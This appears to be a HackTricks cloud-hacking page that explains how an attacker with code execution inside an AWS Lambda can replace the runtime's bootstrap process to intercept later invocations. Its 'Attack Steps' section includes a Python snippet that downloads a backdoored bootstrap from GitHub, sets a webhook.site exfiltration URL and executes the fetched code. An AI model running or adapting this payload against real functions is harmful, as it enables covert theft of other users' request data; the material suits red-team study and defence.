AWS - Steal Lambda Requests
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Lambda Flow
- Slicer is a process outside the container that send invocations to the init process.
- The init process listens on port 9001 exposing some interesting endpoints:
/2018-06-01/runtime/invocation/next
– get the next invocation event/2018-06-01/runtime/invocation/{invoke-id}/response
– return the handler response for the invoke/2018-06-01/runtime/invocation/{invoke-id}/error
– return an execution error
- bootstrap.py has a loop getting invocations from the init process and calls the users code to handle them (
/next
). - Finally, bootstrap.py sends to init the response
Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
Stealing Lambda Requests
The goal of this attack is to make the users code execute a malicious bootstrap.py
process inside the bootstrap.py
process that handle the vulnerable request. This way, the malicious bootstrap process will start talking with the init process to handle the requests while the legit bootstrap is trapped running the malicious one, so it won't ask for requests to the init process.
This is a simple task to achieve as the code of the user is being executed by the legit bootstrap.py
process. So the attacker could:
- Send a fake result of the current invocation to the init process, so init thinks the bootstrap process is waiting for more invocations.
- A request must be sent to
/${invoke-id}/response
- The invoke-id can be obtained from the stack of the legit
bootstrap.py
process using the inspect python module (as proposed here) or just requesting it again to/2018-06-01/runtime/invocation/next
(as proposed here).
- A request must be sent to
- Execute a malicious
boostrap.py
which will handle the next invocations- For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
- For this attack, it's enough to get the original code of
bootstrap.py
from the system or github, add the malicious code and run it from the current lambda invocation.
Attack Steps
- Find a RCE vulnerability.
- Generate a malicious bootstrap (e.g. https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
- Execute the malicious bootstrap.
You can easily perform these actions running:
python3 <<EOF
import os
import urllib3
# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data
# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"
exec(new_runtime)
EOF
For more info check https://github.com/carlospolop/lambda_bootstrap_switcher
References
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.